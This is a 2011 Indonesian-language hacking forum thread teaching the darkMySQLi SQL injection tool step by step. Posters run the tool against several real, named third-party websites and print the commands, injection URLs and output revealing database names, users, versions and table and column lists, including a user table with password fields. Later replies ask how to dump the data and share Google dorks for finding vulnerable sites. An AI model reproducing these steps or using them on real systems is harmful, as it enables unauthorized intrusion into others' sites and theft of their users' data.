> > > > > >


darkMySQLI tutorial step by step
andhie_13 Offline

0 - 3
#11
09-15-2011, 02:54 AM
kk, kyk'y penggunaannya hampir sama dengan pake schemafuzz yh.....
Smile
 
Find
Reply

THJC Offline
Linuxtivist
112 - 2,625
#12
09-15-2011, 10:14 PM
(09-14-2011, 09:05 PM)junior.riau18 Wrote: ini mirip schemafuzz hihihihi
ane baru coba di windows yang beginian,,di bt5 belum heheh
(08-31-2011, 09:40 PM)wine trochanter Wrote:
(08-31-2011, 08:43 PM)zee eichel Wrote: tools ini mungkin memang sudah basi .. tapi berhubung ada di backtrack 5 so .. ane rasa mesti ane posting di mari ...hmmm.. jadi bagi teman2 yang sudah tau tentang tools ini harap diam dan biarkan yang lain yang belum tau bisa belajar Tongue

ok deh langsung saja

di backtrack 5 R1 tools ini berada pada directory
Code:
/pentest/web/darkmysqli

ok anggap udah di dalam ya ...

Code:
root@zee-eichel{/pentest/web/darkmysqli}:ls
./  ../  darkMySQLi.log  DarkMySQLi.py  
root@zee-eichel{/pentest/web/darkmysqli}:

ane kebetulan dapet situs yang vurln bakal ane jadiin contoh di mari Tongue

Code:
ttp://www.asf.ca/news.php?id=720'

udah ane kirim email ke adminya biar di patch kok Tongue cuma buat sample doang...

ok sekarang kita lihat opsi help pada tools ini

Spoiler! :
root@zee-eichel{/pentest/web/darkmysqli}:python DarkMySQLi.py --help

darkMySQLi v1.6 [email protected]
forum.darkc0de.com
Usage: ./darkMySQLi.py [options]
Options:
-h, --help shows this help message and exits
-d, --debug display URL debug information

Target:
-u URL, --url=URL Target url

Methodology:
-b, --blind Use blind methodology (req: --string)
-s, --string String to match in page when the query is valid
Method:
--method=PUT Select to use PUT method ** NOT WORKING
Modes:
--dbs Enumerate databases MySQL v5+
--schema Enumerate Information_schema (req: -D,
opt: -T) MySQL v5+
--full Enumerate all we can MySQL v5+
--info MySQL Server configuration MySQL v4+
--fuzz Fuzz Tables & Columns Names MySQL v4+
--findcol Find Column length MySQL v4+
--dump Dump database table entries (req: -T,
opt: -D, -C, --start) MySQL v4+
--crack=HASH Crack MySQL Hashs (req: --wordlist)
--wordlist=LIS.TXT Wordlist to be used for cracking
Define:
-D DB database to enumerate
-T TBL database table to enumerate
-C COL database table column to enumerate
Optional:
--ssl To use SSL
--end To use + and -- for the URLS --end "--" (Default)
To use /**/ and /* for the URLS --end "/*"
--rowdisp Do not display row # when dumping
--start=ROW Row number to begin dumping at
--where=COL,VALUE Use a where clause in your dump
--orderby=COL Use a orderby clause in your dump
--cookie=FILE.TXT Use a Mozilla cookie file
--proxy=PROXY Use a HTTP proxy to connect to the target url
--output=FILE.TXT Output results of tool to this file


Untuk tahap awal kita harus mencari colom dari database situs target

syntax
Quote:python DarkMySQLi.py -u situstarget.com/bugs.php?id=[sql error] --findcol

Spoiler! :
root@zee-eichel{/pentest/web/darkmysqli}:python DarkMySQLi.py -u http://www.asf.ca/news.php?id=720 --findcol

|--------------------------------------------------|
| [email protected] v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.asf.ca/news.php?id=720
[+] 18:07:13
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,
[+] Column Length is: 2
[+] Found null column at column #: 2,

[!] SQLi URL: http://www.asf.ca/news.php?id=720+AND+1=...SELECT+1,2--
[!] darkMySQLi URL: http://www.asf.ca/news.php?id=720+AND+1=...1,darkc0de--

[-] 18:07:20
[-] Total URL Requests: 2
[-] Done

Don't forget to check darkMySQLi.log

klo situs tadi vurln maka Langkah berikutnya seperti akhir pesan pada toos tersebut "Don't forget to check darkMySQLI.log" maka kita periksa log tersebut yang berada dalam satu directory dengan tools tersebut
Spoiler! :

root@zee-eichel{/pentest/web/darkmysqli}:cat darkMySQLi.log
|--------------------------------------------------|
| [email protected] v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.asf.ca/news.php?id=720
[+] 18:45:16
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,
[+] Column Length is: 2
[+] Found null column at column #: 2,

[!] SQLi URL: http://www.asf.ca/news.php?id=720+AND+1=...SELECT+1,2--
[!] darkMySQLi URL: http://www.asf.ca/news.php?id=720+AND+1=...1,darkc0de--

[-] [18:45:24]
[-] Total URL Requests: 2
[-] Done


nah perhatikan yang udah ane kasi warna merah ,, untuk langkah ketiga masukan sintax

Tujuan kita sebenarnya adalah menampilkan semua kolom yang ada pada database situs korban

Quote:python DarkMySQLi.py -u [url dari log dark log]-- --full

Spoiler! :

root@zee-eichel{/pentest/web/darkmysqli}:python DarkMySQLi.py -u http://www.asf.ca/news.php?id=720+AND+1=...1,darkc0de-- --full

|--------------------------------------------------|
| [email protected] v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.asf.ca/news.php?id=720+AND+1=...1,darkc0de
[+] 18:54:36
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: asfc4477_asfdb
User: asfc4477_asfuser@localhost
Version: 5.1.56-log
[+] Starting full SQLi information_schema enumeration...
[+] Number of Rows: 790
[-] Unexpected error: <class 'urllib2.HTTPError'>
[-] Trying again!
[proxy]: None
[agent]: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[debug]: http://www.asf.ca/news.php?id=720+AND+1=...+LIMIT+0,1--



[-] 18:54:41
[-] Total URL Requests: 3
[-] Done

Don't forget to check darkMySQLi.log

Lankah selanjutnya adalah liat lagi di log tadi

Spoiler! :

|--------------------------------------------------|
| [email protected] v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.asf.ca/news.php?id=720+AND+1=...1,darkc0de
[+] 18:54:36
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: asfc4477_asfdb
User: asfc4477_asfuser@localhost
Version: 5.1.56-log
[+] Number of Rows: 790


[-] [18:54:41]
[-] Total URL Requests: 3
[-] Done


Perhatikan lagi yang ane warnai merah Tongue
kita sudah mendapatkan nama database, user dan versi ,, masih 5 w0w w0w .. masih ada juga yang make versi 5 ckckckkc

Langkah selanjutnya tinggal dump databasenya kwkwkwkw
bisa pake manual kan udah ada tuh ..

syntax
Code:
darkMySQLi.py -u "(target yg ada bug)" --dump -D (nama databasenya) -T (nama table) -C (column,column)

udah dulu deh moga berguna ..Tongue

mas saya sudah dapat seperti ini dan cara dumpnya gmna? mash bingung mas

[+] URL: http://mti.ugm.ac.id/~budi/show.php?id=1...e,darkc0de
[+] 20:35:51
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: budi
User: budi@localhost
Version: 5.1.41-3ubuntu12.10
[+] Starting full SQLi information_schema enumeration...
[+] Number of Rows: 29

[Database]: budi
[Table: Columns]

[1]blog: nama,url
[2]buku_tamu: tanggal,nama,email,komentar
[3]downl: ID,Diskripsi,AttactM,TglKirim
[4]inform: ID,Tanggal,Judul,Kategori,Diskripsi,Image,Author
[5]kategori: kode,deskripsi
[6]link: id,url,diskripsi
[7]mahasiswa: nim,nama,prody
[8]prody: kode,nama
[9]quote: kd,isi

[-] 20:36:09
[-] Total URL Requests: 32
[-] Done

Don't forget to check darkMySQLi.log

root@bt:/pentest/web/darkmysqli#

tapi malah error mas

coba pelan2 bro,,oh ya
udah saya coba ini dari windows hehe
ada nya table ini ==>>
Database: budi
[8 tables]
+-----------+
| buku_tamu |
| downl |
| inform |
| kategori |
| link |
| mahasiswa |
| prody |
| quote |
+-----------+

g ketemu sama saya yang berbau password hehehheh Big Grin

Coba inform...
Kali aja kepanjangan dari informasi
(09-15-2011, 02:54 AM)andhie_13 Wrote: kk, kyk'y penggunaannya hampir sama dengan pake schemafuzz yh.....
Smile

Yap Smile
Yang putih, yang seharusnya ber-aksi dan berbakat!
Linuxtivist blog
 
Website Find
Reply

Junior Riau Offline
http://www.juniorriau.com
95 - 2,063
#13
09-16-2011, 05:24 PM
udah ane bongkar kak,,tapi g ada yng berbau password,
udah ane kirim malah komentar haha
Junior IBTeam - official site
gained facebook account
 
Find
Reply

iKONspirasi Offline
Sysadmin
56 - 2,544
#14
09-27-2011, 10:12 PM
om zee, ane minta ijin copas ini tutorial ke blog boleh ga? tq
I'm @ikonspirasi - Facebook
Personal blog: http://ikonspirasi.net
 
Website Find
Reply

OWL#9 Offline

0 - 5
#15
12-05-2011, 11:15 PM
Code:
darkMySQLi.py -u "(target yg ada bug)" --dump -D (nama databasenya) -T (nama table) -C (column,column)

kk, saya masih bingung yang mana nama table dan column,column padahal saya sudah dapat sampai sini. dilanjut yah coba!
kalo udah dapet replay kk. INGAT JANGAN DIRUSAk itu web. kita hanya belajar. OKBig Grin

root@bt:/pentest/web/darkmysqli# python DarkMySQLi.py -u http://www.ciptaagro.com/artikel/artikel.php?id=13 --findcol

|--------------------------------------------------|
| [email protected] v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.ciptaagro.com/artikel/artikel.php?id=13
[+] 22:05:29
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,3,4,5,
[+] Column Length is: 5
[+] Found null column at column #: 1,2,3,4,

[!] SQLi URL: http://www.ciptaagro.com/artikel/artikel...+1,2,3,4,5--
[!] darkMySQLi URL: http://www.ciptaagro.com/artikel/artikel...darkc0de,5--

[-] 22:05:50
[-] Total URL Requests: 5
[-] Done

Don't forget to check darkMySQLi.log

root@bt:/pentest/web/darkmysqli# python DarkMySQLi.py -u http://www.ciptaagro.com/artikel/artikel...darkc0de,5-- --full

|--------------------------------------------------|
| [email protected] v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.ciptaagro.com/artikel/artikel...darkc0de,5
[+] 22:07:13
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ciptaagr_cas_database
User: ciptaagr_cas2@localhost
Version: 5.0.92-community
[+] Starting full SQLi information_schema enumeration...
[+] Number of Rows: 58

[Database]: ciptaagr_cas_database
[Table: Columns]

[1]artikel: idartikel,judul,isi,tanggal,status
[2]banner: idbanner,pemilik,tglmasuk,status,keterangan,gambar
[3]berita: idberita,tipe,judul,isi,tanggal,status
[4]inbox: idpesan,tanggal,nama,email,alamat,telp,perusahaan,pesan,baca
[5]jenis: idjenis,nama_jenis,keterangan,idkategori
[6]kategori: idkategori,nama_kategori,keterangan
[7]komen: idkomen,komentar,tanggal,status,idartikel,userid
[8]produk: idproduk,idkategori,idjenis,nama,stok,keterangan,gambar,slide
[9]user: userid,username,nama,password,email,website,perusahaan,telepon,tipe,status
[10]visitor: jumlah

[-] 22:16:23
[-] Total URL Requests: 61
[-] Done

Don't forget to check darkMySQLi.log



 
Find
Reply

dumbastish Offline
root@dumbastish
7 - 65
#16
12-09-2011, 04:02 PM
om kok ane ga bisa ya ...
pas di bagian --full nongol beginian om :

+] 14:59:22
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Opera/8.00 (Windows NT 5.1; U; en)
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...

[-] There seems to be a problem with your URL. Please check and try again.
[DEBUG]: http://www.xxxxxxxxxxxxx.com/catalog.php...1e,0x20),2--

kenapa om ?? mohon bantuan ..
i am back | ketika merasa kurang pintar, disaat itulah anda pintar.
 
Find
Reply

NapoLeon|APU Offline

0 - 5
#17
12-09-2011, 04:29 PM
SmileWOw kk Wow.... nnti gw coba lg download Backtrack 5r1 nya....:badpc:
Angry
 
Find
Reply

surya Offline

3 - 10
#18
12-11-2011, 06:45 PM
cara dapatkan situs yang vurln gi mana,maklum pengguna baru
 
Find
Reply

nicole Offline

8 - 33
#19
12-11-2011, 09:06 PM
(12-11-2011, 06:45 PM)surya Wrote: cara dapatkan situs yang vurln gi mana,maklum pengguna baru

googling om with dork.
dork :
-inurl:trainers.php?id=

-inurl:buy.php?category=

-inurl:article.php?ID=

-inurl:play_old.php?id=

AngryConfused
 
Find
Reply

biecyber Offline
Beginner
14 - 99
#20
12-12-2011, 11:18 AM
bro zee, ane mau tanya, apakah itu hanya berlaku untuk situs2 yang masih pake php native ya ?? yang query string nya masih pake tanda tanya '?id=1', nah kalo misalnya ya udah anti SQL injection, model" website sekarang yang udah banyak pake framework gmn ??? apa masih bisa kita hajar pake SQL Injection ??? mohon pencerahan.
echo (attacked==1) ? defend : counter attack;
 
Find
Reply






Users browsing this thread: 1 Guest(s)